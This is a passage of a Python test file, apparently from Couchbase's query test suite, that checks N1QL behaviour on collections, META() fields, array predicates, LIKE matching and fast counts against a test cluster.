# tuq_sanity.py
import datetime
import json
import math
import random
import re
import time
import threading
from datetime import date
from deepdiff import DeepDiff
from membase.api.exception import CBQError
from membase.api.rest_client import RestConnection
from remote.remote_util import RemoteMachineShellConnection
from collection.collections_n1ql_client import CollectionsN1QL
from .tuq import QueryTests
class QuerySanityTests(QueryTests):
def setUp(self):
super(QuerySanityTests, self).setUp()
self.log.info("============== QuerySanityTests setup has started ==============")
self.index_to_be_created = self.input.param("index_to_be_created", '')
self.query_to_be_run = self.input.param("query_to_be_run", '')
if self.load_sample:
self.rest.load_sample("travel-sample")
self.wait_for_all_indexes_online()
self.log.info("============== QuerySanityTests setup has completed ==============")
self.log_config_info()
self.query_buckets = self.get_query_buckets(check_all_buckets=True)
self.collection_names = []
self.creation_failure = []
self.deletion_failure = []
def suite_setUp(self):
super(QuerySanityTests, self).suite_setUp()
self.log.info("============== QuerySanityTests suite_setup has started ==============")
if self.input.param("fast_count", False):
random_number = 23917
shell = RemoteMachineShellConnection(self.master)
shell.execute_cbworkloadgen(self.rest.username, self.rest.password, random_number, 100,
self.default_bucket_name, 1024, '-j')
self.run_cbq_query(
query="INSERT INTO " + self.query_buckets[0] +
" ( key, value) VALUES ('pymc100205',{'name':'Sara','age':'30'})")
self.log.info("============== QuerySanityTests suite_setup has completed ==============")
def tearDown(self):
self.log.info("============== QuerySanityTests tearDown has started ==============")
self.log.info("============== QuerySanityTests tearDown has completed ==============")
super(QuerySanityTests, self).tearDown()
def suite_tearDown(self):
self.log.info("============== QuerySanityTests suite_tearDown has started ==============")
self.log.info("============== QuerySanityTests suite_tearDown has completed ==============")
super(QuerySanityTests, self).suite_tearDown()
##############################################################################################
#
# SIMPLE CHECKS
##############################################################################################
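# The next three tests check that querying a collection that does not exist fails with an
# error message containing the fully qualified keyspace path (default:default.test.tes),
# whether the path is given explicitly, relative to a query_context, or with an explicit namespace.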
def test_error_message_collections_full(self):
try:
self.run_cbq_query(query="SELECT * FROM default:default.test.tes")
self.fail("This query should error")
except Exception as e:
self.assertTrue("Keyspace not found in CB datastore: default:default.test.tes" in str(e), "The full path was not inside the error message! {0}".format(str(e)))
try:
self.run_cbq_query(query="SELECT * FROM default.test.tes")
self.fail("This query should error")
except Exception as e:
self.assertTrue("Keyspace not found in CB datastore: default:default.test.tes" in str(e), "The full path was not inside the error message! {0}".format(str(e)))
def test_error_message_collections_query_context(self):
try:
self.run_cbq_query(query="SELECT * FROM tes", query_context=self.query_context)
self.fail("This query should error")
except Exception as e:
self.assertTrue("Keyspace not found in CB datastore: default:default.test.tes" in str(e),
"The full path was not inside the error message! {0}".format(str(e)))
def test_error_namespace(self):
try:
results = self.run_cbq_query(query='select * from default.test.tes where name = "new hotel"', query_context='default:')
self.fail("This query should error")
except Exception as e:
self.assertTrue("Keyspace not found in CB datastore: default:default.test.tes" in str(e), "The full path was not inside the error message! {0}".format(str(e)))
def test_stats_collections(self):
curl_output = self.shell.execute_command(
"curl http://{0}:{1}/admin/stats".format(self.master.ip, self.n1ql_port))
curl = json.loads(curl_output[0][0])
starting_deletes = curl['deletes.count']
starting_selects = curl['selects.count']
starting_inserts = curl['inserts.count']
try:
self.run_cbq_query(query="CREATE PRIMARY INDEX ON default:default.{0}.{1}".format(self.scope, self.collections[0]))
self.run_cbq_query(query="SELECT * FROM default:default.test.test1 b WHERE b.name = 'new hotel'")
self.run_cbq_query(query="SELECT * FROM test1 b WHERE b.name = 'new hotel'",
query_context='default:default.test')
self.run_cbq_query(
query=('INSERT INTO default:default.{0}.{1}'.format(self.scope, self.collections[
0]) + '(KEY, VALUE) VALUES ("key6", { "type" : "hotel", "name" : "new hotel" })'))
self.run_cbq_query(
query='DELETE FROM default:default.test.test1 LIMIT 1')
curl_output = self.shell.execute_command(
"curl http://{0}:{1}/admin/stats".format(self.master.ip, self.n1ql_port))
curl = json.loads(curl_output[0][0])
self.assertEqual(curl['deletes.count'], starting_deletes + 1)
self.assertEqual(curl['selects.count'], starting_selects + 2)
self.assertEqual(curl['inserts.count'], starting_inserts + 1)
except Exception as e:
self.log.error("One of the queries failed or the stats were wrong: {0}".format(str(e)))
self.fail()
def test_stats_collections_prepareds(self):
try:
self.run_cbq_query(query="PREPARE p1 AS SELECT * FROM default:default.test.test1 b WHERE b.name = 'new hotel'")
self.run_cbq_query(query="PREPARE p2 AS SELECT * FROM test1 b WHERE b.name = 'new hotel'", query_context='default:default.test')
self.run_cbq_query(query="execute p2", query_context='default:default.test')
self.run_cbq_query(query="execute p1", query_context='default:default.test')
curl_output = self.shell.execute_command("curl http://{0}:{1}/admin/stats".format(self.master.ip, self.n1ql_port))
curl = json.loads(curl_output[0][0])
self.assertEqual(curl['prepared.count'], 2)
finally:
self.run_cbq_query(query="DELETE from system:prepareds")
def test_escaped_identifiers(self):
self.fail_if_no_buckets()
queries_errors = {'SELECT name FROM {0} as bucket': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
for query_bucket in self.query_buckets:
self.query = 'SELECT name FROM %s as `bucket` ORDER BY name' % query_bucket
actual_result = self.run_cbq_query()
expected_list = [{"name": doc["name"]} for doc in self.full_list]
expected_list_sorted = sorted(expected_list, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_list_sorted)
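# Prepare a statement, restart every server, then re-submit the prepared name together
# with its encoded_plan through the REST query service and verify the result count.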
def test_prepared_encoded_rest(self):
result_count = 1412
if not self.sample_bucket:
self.sample_bucket = 'beer-sample'
self.rest.load_sample(self.sample_bucket)
self.wait_for_buckets_status({self.sample_bucket: "healthy"}, 5, 120)
self.wait_for_bucket_docs({self.sample_bucket: 7303}, 5, 120)
self._wait_for_index_online('beer-sample', 'beer_primary')
query_bucket = self.get_collection_name(self.sample_bucket)
try:
query = 'create index myidx on {0}(name,country,code) where (type="brewery")'.format(query_bucket)
self.run_cbq_query(query)
self._wait_for_index_online('beer-sample', 'myidx')
query = 'prepare s1 from SELECT name, IFMISSINGORNULL(country,999), IFMISSINGORNULL(code,999)' \
' FROM {0} WHERE type = "brewery" AND name IS NOT MISSING'.format(query_bucket)
result = self.run_cbq_query(query)
encoded_plan = '"' + result['results'][0]['encoded_plan'] + '"'
for server in self.servers:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
time.sleep(20)
server = None
for server in self.servers:
remote = RemoteMachineShellConnection(server)
remote.start_server()
self.wait_for_buckets_status({self.sample_bucket: "healthy"}, 5, 120)
self.wait_for_bucket_docs({self.sample_bucket: 7303}, 5, 120)
self._wait_for_index_online('beer-sample', 'beer_primary')
cmd = "%s http://%s:%s/query/service -u %s:%s -H 'Content-Type: application/json' " \
"-d '{ \"prepared\": \"s1\", \"encoded_plan\": %s }'" % (
self.curl_path, server.ip, self.n1ql_port, self.username, self.password, encoded_plan)
for server in self.servers:
remote = RemoteMachineShellConnection(server)
result = remote.execute_command(cmd)
new_list = [string.strip() for string in result[0]]
concat_string = ''.join(new_list)
json_output = json.loads(concat_string)
self.log.info(json_output['metrics']['resultCount'])
self.assertEqual(json_output['metrics']['resultCount'], result_count)
finally:
self.rest.delete_bucket(self.sample_bucket)
self.wait_for_bucket_delete(self.sample_bucket, 5, 120)
# These bugs are not planned to be fixed, therefore this test isn't included in any confs
'''MB-19887 and MB-24303: These queries were returning incorrect results with views.'''
def test_views(self):
self.fail_if_no_buckets()
created_indexes = []
try:
idx = "ix1"
self.query = "CREATE INDEX %s ON " % idx + self.query_buckets[0] + " (x,y) USING VIEW"
self.run_cbq_query()
created_indexes.append(idx)
time.sleep(15)
self.run_cbq_query("insert into " + self.query_buckets[0] + " values ('k01',{'x':10})")
result = self.run_cbq_query("select x,y from " + self.query_buckets[0] + " where x > 3")
self.assertTrue(result['results'][0] == {"x": 10})
self.run_cbq_query('insert into ' + self.query_buckets[0] + ' values("k02", {"x": 20, "y": 20})')
self.run_cbq_query('insert into ' + self.query_buckets[0] + ' values("k03", {"x": 30, "z": 30})')
self.run_cbq_query('insert into ' + self.query_buckets[0] + ' values("k04", {"x": 40, "y": 40, "z": 40})')
idx2 = "iv1"
self.query = "CREATE INDEX %s ON " % idx2 + self.query_buckets[0] + " (x,y,z) USING VIEW"
self.run_cbq_query()
created_indexes.append(idx2)
expected_result = [{'x': 10}, {'x': 20, 'y': 20}, {'x': 30, 'z': 30}, {'x': 40, 'y': 40, 'z': 40}]
result = self.run_cbq_query('select x,y,z from ' + self.query_buckets[0] + ' use index (iv1 using view) '
'where x is not missing')
self.assertTrue(result['results'] == expected_result)
finally:
for idx in created_indexes:
self.query = "DROP INDEX %s ON %s USING VIEW" % (self.query_buckets[0], idx)
self.run_cbq_query()
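# The following tests verify the META() fields (keyspace, id, cas, expiration) when a
# collection is addressed by its full path or through query_context.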
def test_collections_meta_keyspace(self):
results = self.run_cbq_query(query='select meta(d) from default:default.test.test1 as d')
self.assertEqual(results['results'][0]['$1']['keyspace'], 'default:default.test.test1')
def test_collections_meta_query_context(self):
results = self.run_cbq_query(query='select meta(d) from test1 as d', query_context='default:default.test')
self.assertEqual(results['results'][0]['$1']['keyspace'], 'default:default.test.test1')
def test_collections_meta_keyspace_full(self):
results = self.run_cbq_query(query='select meta(default.test.test1) from default:default.test.test1')
self.assertEqual(results['results'][0]['$1']['keyspace'], 'default:default.test.test1')
results = self.run_cbq_query(query='select meta(default:default.test.test1) from default:default.test.test1')
self.assertEqual(results['results'][0]['$1']['keyspace'], 'default:default.test.test1')
def test_collections_meta_id(self):
results = self.run_cbq_query(query='select meta(d).id from default:default.test.test1 as d')
self.assertEqual(results['results'], [{'id': 'key1'}, {'id': 'key2'}, {'id': 'key3'}, {'id': 'key4'}])
results = self.run_cbq_query(query='select meta(d).id from test1 as d', query_context='default:default.test')
self.assertEqual(results['results'], [{'id': 'key1'}, {'id': 'key2'}, {'id': 'key3'}, {'id': 'key4'}])
def test_collections_meta_id_full_path(self):
results = self.run_cbq_query(query='select meta(default.test.test1).id from default:default.test.test1')
self.assertEqual(results['results'], [{'id': 'key1'}, {'id': 'key2'}, {'id': 'key3'}, {'id': 'key4'}])
results = self.run_cbq_query(query='select meta(default:default.test.test1).id from default:default.test.test1')
self.assertEqual(results['results'], [{'id': 'key1'}, {'id': 'key2'}, {'id': 'key3'}, {'id': 'key4'}])
def test_collections_meta_cas(self):
results = self.run_cbq_query(query='select meta(d).cas from default:default.test.test1 as d')
self.assertEqual(results['metrics']['resultCount'], 4)
results = self.run_cbq_query(query='select meta(d).cas from test1 as d', query_context='default:default.test')
self.assertEqual(results['metrics']['resultCount'], 4)
def test_collections_meta_cas_full(self):
results = self.run_cbq_query(query='select meta(default.test.test1).cas from default:default.test.test1')
self.assertEqual(results['metrics']['resultCount'], 4)
results = self.run_cbq_query(query='select meta(default:default.test.test1).cas from default:default.test.test1')
self.assertEqual(results['metrics']['resultCount'], 4)
def test_collections_meta_expiration(self):
results = self.run_cbq_query(query='select meta(d).expiration from default:default.test.test1 as d')
self.assertEqual(results['results'], [{'expiration': 0}, {'expiration': 0}, {'expiration': 0}, {'expiration': 0}])
results = self.run_cbq_query(query='select meta(d).expiration from test1 as d', query_context='default:default.test')
self.assertEqual(results['results'], [{'expiration': 0}, {'expiration': 0}, {'expiration': 0}, {'expiration': 0}])
def test_collections_meta_expiration_full(self):
results = self.run_cbq_query(query='select meta(default.test.test1).expiration from default:default.test.test1')
self.assertEqual(results['results'], [{'expiration': 0}, {'expiration': 0}, {'expiration': 0}, {'expiration': 0}])
results = self.run_cbq_query(query='select meta(default:default.test.test1).expiration from default:default.test.test1')
self.assertEqual(results['results'], [{'expiration': 0}, {'expiration': 0}, {'expiration': 0}, {'expiration': 0}])
''' Concurrently create and drop collections, giving each 5 seconds to appear in (or disappear from) system:keyspaces; if any single creation or deletion fails, the whole test fails '''
def test_create_drop_collections(self):
self.collections_helper = CollectionsN1QL(self.master)
self.collections_helper.create_scope(bucket_name="default", scope_name="scope1")
self.collections_helper.create_scope(bucket_name="default", scope_name="scope2")
for i in range(0, 100):
thread_name = threading.Thread(name='run_collection', target=self.run_create_collection,args=("scope1", "collection1" + str(i)))
thread2_name = threading.Thread(name='run_collection', target=self.run_create_collection,args=("scope2", "collection2" + str(i)))
thread_name.start()
thread2_name.start()
self.sleep(1)
if len(self.creation_failure) > 0:
for collection in self.creation_failure:
self.log.error("Creation failed for collection: {0}".format(str(collection)))
self.fail("Some collections failed to create! Check logs for more details")
if len(self.collection_names) > 0:
for collection in self.collection_names:
delete_thread = threading.Thread(name='drop_collection', target=self.run_drop_collection,
args=(collection[0], collection[1]))
delete_thread.start()
delete_thread.join()
if len(self.deletion_failure) > 0:
for collection in self.deletion_failure:
self.log.error("Deletion failed for collection: {0}".format(str(collection)))
self.fail("Some collections failed to drop! Check logs for more details")
retry_count = 100
while retry_count > 0:
if len(self.collection_names) > 0:
for collection in self.collection_names:
delete_thread = threading.Thread(name='drop_collection', target=self.run_drop_collection,
args=(collection[0], collection[1]))
delete_thread.start()
if len(self.deletion_failure) > 0:
for collection in self.deletion_failure:
self.log.error("Deletion failed for collection: {0}".format(str(collection)))
self.fail("Some collections failed to drop! Check logs for more details")
self.sleep(.5)
retry_count -= 1
if len(self.creation_failure) > 0:
for collection in self.creation_failure:
self.log.error("Creation failed for collection: {0}".format(str(collection)))
self.fail("Some collections failed to create! Check logs for more details")
if len(self.deletion_failure) > 0:
for collection in self.deletion_failure:
self.log.error("Deletion failed for collection: {0}".format(str(collection)))
self.fail("Some collections failed to drop! Check logs for more details")
'''Create a collection and verify that within 5 seconds it is part of system:keyspaces; print any errors that occur'''
def run_create_collection(self, scope_name='',collection_name=''):
retry_count = 5
created = self.collections_helper.create_collection(bucket_name="default", scope_name=scope_name, collection_name=collection_name)
while retry_count > 0:
try:
results = self.run_cbq_query('select * from system:keyspaces where name = "{0}"'.format(collection_name))
if results['metrics']['resultCount'] == 1:
break
except Exception as e:
self.log.info(str(e))
# fall through to the sleep and retry_count decrement below even when the query fails
self.sleep(1)
retry_count -= 1
# the failure lists hold (scope, collection, reason) tuples, so match on the collection name
if retry_count <= 0:
if not any(collection_name == failure[1] for failure in self.creation_failure):
self.creation_failure.append((scope_name, collection_name, "Entry not found in system:keyspaces"))
if not any(collection_name == failure[1] for failure in self.creation_failure):
self.collection_names.append((scope_name, collection_name))
return
'''Drop a collection and verify that within 5 seconds it is removed from system:keyspaces'''
def run_drop_collection(self, scope_name='', collection_name=''):
retry_count = 5
deleted = self.collections_helper.delete_collection(bucket_name="default", scope_name=scope_name, collection_name=collection_name)
while retry_count > 0:
try:
results = self.run_cbq_query('select * from system:keyspaces where name = "{0}"'.format(collection_name))
if results['metrics']['resultCount'] == 0:
break
except Exception as e:
if 'Keyspace not found in CB datastore' in str(e):
break
# fall through to the sleep and retry_count decrement below for any other error
self.sleep(1)
retry_count -= 1
if retry_count <= 0:
if not any(collection_name == failure[1] for failure in self.deletion_failure):
self.deletion_failure.append((scope_name, collection_name, "Entry not deleted from system:keyspaces"))
self.collection_names.remove((scope_name, collection_name))
return
##############################################################################################
#
# ALL
##############################################################################################
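# SELECT ALL keeps duplicates (it is the opposite of DISTINCT), so results are compared
# against every document in full_list without de-duplication.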
def test_all(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT ALL job_title FROM %s ORDER BY job_title' % query_bucket
actual_result = self.run_cbq_query()
expected_result = [{"job_title": doc['job_title']}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title']))
self._verify_results(actual_result['results'], expected_result)
def test_all_nested(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT ALL tasks_points.task1 FROM %s ' % query_bucket + \
'ORDER BY tasks_points.task1'
actual_result = self.run_cbq_query()
expected_result = [{"task1": doc['tasks_points']['task1']}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['task1']))
self._verify_results(actual_result['results'], expected_result)
self.query = 'SELECT ALL skills[0] as skill' + \
' FROM %s ORDER BY skills[0]' % query_bucket
actual_result = self.run_cbq_query()
expected_result = [{"skill": doc['skills'][0]}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['skill']))
self._verify_results(actual_result['results'], expected_result)
if not self.analytics:
self.query = 'SELECT ALL tasks_points.* FROM %s' % query_bucket
actual_result = self.run_cbq_query()
expected_result = [doc['tasks_points'] for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['task1'], doc['task2']))
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['task1'], doc['task2']))
self._verify_results(actual_result, expected_result)
# This method is not used anywhere
def set_indexer_pokemon_settings(self):
projector_json = {"projector.dcp.numConnections": 1}
moi_json = {"indexer.moi.useMemMgmt": True}
server = self.get_nodes_from_services_map(service_type="index")
rest = RestConnection(server)
rest.set_index_settings(projector_json)
self.log.info("{0} set".format(projector_json))
self.sleep(60)
servers = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=True)
for server in servers:
remote = RemoteMachineShellConnection(server)
remote.terminate_process(process_name="projector")
self.sleep(60)
self.sleep(60)
# self.set_indexer_logLevel()
self.loglevel = "info"
self.log.info("Setting indexer log level to {0}".format(self.loglevel))
server = self.get_nodes_from_services_map(service_type="index")
rest = RestConnection(server)
rest.set_indexer_params("logLevel", self.loglevel)
self.sleep(30)
rest.set_index_settings(moi_json)
self.log.info("{0} set".format(moi_json))
self.sleep(30)
def test_all_negative(self):
queries_errors = {'SELECT ALL * FROM %s': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
def test_keywords(self):
queries_errors = {'SELECT description as DESC FROM %s order by DESC': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
def test_distinct_negative(self):
queries_errors = {'SELECT name FROM {0} ORDER BY DISTINCT name': ('syntax error', 3000),
'SELECT name FROM {0} GROUP BY DISTINCT name': ('syntax error', 3000),
'SELECT ANY tasks_points FROM {0}': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
def test_any(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM {0} d WHERE (ANY skill IN d.skills SATISFIES skill = 'skill2010' " \
"END) AND (ANY vm IN d.VMs SATISFIES vm.RAM = 5 END) AND NOT (job_title = 'Sales') ORDER BY" \
" name".format(query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name'], "email": doc["email"]}
for doc in self.full_list
if len([skill for skill in doc["skills"]
if skill == 'skill2010']) > 0 and
len([vm for vm in doc["VMs"]
if vm["RAM"] == 5]) > 0 and
doc["job_title"] != 'Sales']
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
# This test isn't used anywhere
def test_any_within(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM %s " % query_bucket + \
" d WHERE ANY vm within d.VMs SATISFIES vm.RAM = 5 END"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name'], "email": doc["email"]}
for doc in self.full_list
if len([vm for vm in doc["VMs"]
if vm["RAM"] == 5]) > 0]
self._verify_results(actual_result['results'], expected_result)
def test_any_no_in_clause(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name, email FROM %s d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' end)" + \
"AND (ANY vm IN d.VMs SATISFIES vm.RAM = 5 end) " + \
"AND NOT (job_title = 'Sales') ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name'], "email": doc["email"]}
for doc in self.full_list
if len([skill for skill in doc["skills"]
if skill == 'skill2010']) > 0 and
len([vm for vm in doc["VMs"]
if vm["RAM"] == 5]) > 0 and
doc["job_title"] != 'Sales']
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_prepared_any_no_in_clause(self):
self.fail_if_no_buckets()
if self.monitoring:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 0)
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "SELECT name, email FROM %s as d WHERE " % query_bucket + \
"(ANY skill IN d.skills SATISFIES skill = 'skill2010' end) AND" \
" (ANY vm IN d.VMs SATISFIES vm.RAM = 5 end) " \
"AND NOT (job_title = 'Sales') ORDER BY name"
self.prepared_common_body()
if self.monitoring:
self.query = "select * from system:prepareds"
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 1)
def test_any_external(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT name FROM %s WHERE ' % query_bucket + \
'ANY x IN ["Support", "Management"] SATISFIES job_title = x END ' + \
'ORDER BY name'
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']}
for doc in self.full_list
if doc["job_title"] in ["Support", "Management"]]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_every(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES CEIL(vm.memory) > 5 END) ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']}
for doc in self.full_list
if len([vm for vm in doc["VMs"]
if math.ceil(vm['memory']) > 5]) == len(doc["VMs"])]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_satisfy_negative(self):
queries_errors = {'SELECT name FROM %s WHERE ANY x IN 123 SATISFIES job_title = x END': ('syntax error', 3000),
'SELECT name FROM %s WHERE ANY x IN ["Sales"] SATISFIES job_title = x': (
'syntax error', 3000),
'SELECT job_title FROM %s WHERE ANY job_title IN ["Sales"] SATISFIES job_title = job_title '
'END': (
'syntax error', 3000),
'SELECT job_title FROM %s WHERE EVERY ANY x IN ["Sales"] SATISFIES x = job_title END': (
'syntax error', 3000)}
self.negative_common_body(queries_errors)
def test_check_is_isnot_negative(self):
queries_errors = {'SELECT * FROM %s WHERE name is foo': ('syntax error', 3000),
'SELECT * FROM %s WHERE name is not foo': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
def test_array(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT ARRAY vm.memory FOR vm IN VMs END AS vm_memories" + \
" FROM %s WHERE VMs IS NOT NULL " % query_bucket
if self.analytics:
self.query = 'SELECT (SELECT VALUE vm.memory FROM VMs AS vm) AS vm_memories FROM %s WHERE VMs IS NOT ' \
'NULL ' % query_bucket
actual_result = self.run_cbq_query()
actual_result = sorted(actual_result['results'], key=lambda doc: (doc['vm_memories']))
expected_result = [{"vm_memories": [vm["memory"] for vm in doc['VMs']]}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['vm_memories']))
self._verify_results(actual_result, expected_result)
# This test is not used anywhere
def test_array_objects(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT VMs[*].os from %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = actual_result['results']
expected_result = [{"os": [vm["os"] for vm in doc['VMs']]}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_arrays_negative(self):
queries_errors = {'SELECT ARRAY vm.memory FOR vm IN 123 END AS vm_memories FROM %s': ('syntax error', 3000),
'SELECT job_title, array_agg(name)[:5] as names FROM %s': ('syntax error', 3000),
'SELECT job_title, array_agg(name)[-20:-5] as names FROM %s': ('syntax error', 3000),
'SELECT job_title, array_agg(name)[a:-b] as names FROM %s': ('syntax error', 3000)}
self.negative_common_body(queries_errors)
# This test is not used anywhere
def test_slicing(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, array_agg(name)[0:5] as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_result = self.run_cbq_query()
for item in actual_result['results']:
self.log.info("Result: %s" % actual_result['results'])
self.assertTrue(len(item['names']) <= 5, "Slicing doesn't work")
self.query = "SELECT job_title, array_agg(name)[5:] as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_result = self.run_cbq_query()
tmp_groups = {doc['job_title'] for doc in self.full_list}
expected_list = [{"job_title": group,
"names": [x["name"] for x in self.full_list
if x["job_title"] == group]}
for group in tmp_groups]
expected_item = None
for item in actual_result['results']:
for tmp_item in expected_list:
if item['job_title'] == tmp_item['job_title']:
expected_item = tmp_item
self.log.info("Result: %s" % actual_result['results'])
self.assertTrue(len(item['names']) == len(expected_item['names']),
"Slicing doesn't work")
self.query = "SELECT job_title, array_agg(name)[5:10] as names" + \
" FROM %s GROUP BY job_title" % query_bucket
actual_result = self.run_cbq_query()
for item in actual_result['results']:
self.log.info("Result: %s" % actual_result['results'])
self.assertTrue(len(item['names']) <= 5, "Slicing doesn't work")
def test_count_prepare(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "create index idx_cover on %s(join_mo,join_day) where join_mo > 7" % query_bucket
self.run_cbq_query()
self.query = "SELECT count(*) AS cnt from %s " % query_bucket + \
"WHERE join_mo > 7 and join_day > 1"
self.prepared_common_body()
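# Repeatedly issue an invalid statement and inspect the goroutine profile endpoint
# (/debug/pprof/goroutine) for NewLexer entries, to catch lexer goroutine leaks.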
def test_leak_goroutine(self):
shell = RemoteMachineShellConnection(self.master)
for i in range(20):
cmd = 'curl http://%s:6060/debug/pprof/goroutine?debug=2 | grep NewLexer' % self.master.ip
o = shell.execute_command(cmd)
new_curl = json.dumps(o)
string_curl = json.loads(new_curl)
self.assertTrue("curl: (7) couldn't connect to host" == str(string_curl[1][1]))
cmd = "curl http://%s:8093/query/service -d 'statement=select * from 1+2+3'" % self.master.ip
o = shell.execute_command(cmd)
new_curl = json.dumps(o)
string_curl = json.loads(new_curl)
self.assertTrue(len(string_curl) == 2)
cmd = 'curl http://%s:6060/debug/pprof/goroutine?debug=2 | grep NewLexer' % self.master.ip
o = shell.execute_command(cmd)
new_curl = json.dumps(o)
string_curl = json.loads(new_curl)
self.assertTrue(len(string_curl) == 2)
##############################################################################################
#
# COUNT
##############################################################################################
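# test_fast_count runs the parameterized count query twice: once as-is (using whatever
# index was created above) and once forced onto the primary index with
# USE INDEX(`#primary`); the two counts must match.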
def test_fast_count(self):
if self.index_to_be_created:
if "EQUALS" in self.index_to_be_created:
self.index_to_be_created = self.index_to_be_created.replace("EQUALS", "=")
self.run_cbq_query(query=self.index_to_be_created)
self.wait_for_all_indexes_online()
try:
if "STAR" in self.query_to_be_run:
self.query_to_be_run = self.query_to_be_run.replace("STAR", "*")
if "EQUALS" in self.query_to_be_run:
self.query_to_be_run = self.query_to_be_run.replace("EQUALS", "=")
# add a USE INDEX(`#primary`) hint to the same query so the secondary-index result can be compared against a primary index scan
actual_results = self.run_cbq_query(query=self.query_to_be_run)
split_query = self.query_to_be_run.split("where")
primary_index_query = split_query[0] + "USE INDEX(`#primary`) where" + split_query[1]
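# Illustrative example of the rewrite above (hypothetical predicate):
# 'SELECT COUNT(*) FROM default where foo = 1' becomes
# 'SELECT COUNT(*) FROM default USE INDEX(`#primary`) where foo = 1'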
expected_results = self.run_cbq_query(query=primary_index_query)
self.assertEqual(actual_results['results'][0]['$1'], expected_results['results'][0]['$1'])
finally:
if self.load_sample:
query_bucket = self.get_collection_name('`travel-sample`')
self.run_cbq_query(query="DROP INDEX idx_flight_stops ON {0}".format(query_bucket))
else:
query_bucket = self.get_collection_name(self.default_bucket_name)
self.run_cbq_query(query="DROP INDEX idx1 ON {0}".format(query_bucket))
def test_primary_count(self):
# number of documents inserted during suite_setUp with fast_count: 23917 loaded via cbworkloadgen plus 1 explicit INSERT
random_number = 23918
RemoteMachineShellConnection(self.master)
if "STAR" in self.query_to_be_run:
self.query_to_be_run = self.query_to_be_run.replace("STAR", "*")
actual_results = self.run_cbq_query(query=self.query_to_be_run)
self.assertEqual(actual_results['results'][0]['$1'], random_number + self.docs_per_day * 2016)
##############################################################################################
#
# LIKE
##############################################################################################
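# LIKE results are validated against equivalent Python string checks (startswith/find),
# and the REVERSE() variants of each predicate must return the same rows.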
def test_like(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM {0} WHERE job_title LIKE 'S%' ORDER BY name".format(query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']} for doc in self.full_list
if doc["job_title"].startswith('S')]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
self.query = "SELECT name FROM {0} WHERE job_title LIKE '%u%' ORDER BY name".format(query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']} for doc in self.full_list
if doc["job_title"].find('u') != -1]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
self.query = "SELECT name FROM {0} WHERE job_title NOT LIKE 'S%' ORDER BY name".format(query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']} for doc in self.full_list
if not doc["job_title"].startswith('S')]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
self.query = "SELECT name FROM {0} WHERE job_title NOT LIKE '_ales' ORDER BY name".format(query_bucket)
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']} for doc in self.full_list
if not (doc["job_title"].endswith('ales') and
len(doc["job_title"]) == 5)]
self.query = "SELECT name FROM {0} WHERE reverse(job_title) NOT LIKE 'sela_' " \
"ORDER BY name".format(query_bucket)
actual_result1 = self.run_cbq_query()
self.assertEqual(actual_result1['results'], actual_result['results'])
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_like_negative(self):
